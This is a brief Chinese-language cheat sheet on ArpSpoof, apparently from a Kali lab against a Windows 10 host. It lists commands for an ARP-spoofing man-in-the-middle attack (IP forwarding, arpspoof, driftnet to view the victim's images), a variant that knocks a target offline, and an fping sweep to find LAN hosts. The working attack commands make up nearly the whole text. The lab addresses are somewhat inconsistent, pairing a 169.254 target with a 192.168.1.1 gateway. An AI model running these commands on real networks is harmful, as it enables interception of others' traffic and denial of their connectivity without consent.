工具:ArpSpoof
命令:
ARP欺骗:目标的IP流量经过攻击机网卡,从网关出去
1、echo 1 >/proc/sys/net/ipv4/ip_forward(进行IP流量转发)
2、arpspoof -i (网卡) -t (目标网关 目标IP)
(3、driftnet -i eth0 【获取流量浏览图片】)
ARP断网命令:目标的IP流量经过攻击机网卡,不从网关出去
arpspoof -i (网卡) -t (目标网关 目标IP)
网卡:kali虚拟机 = eth0 (ifconfig命令查询)
目标IP: win10物理机 = 169.254.xxx.xxx(cmd --> ipconfig)
网关:win10 = 192.168.1.1
注:局域网IP查询
fping -asg 192.168.1.0(局域网前三段加0)/24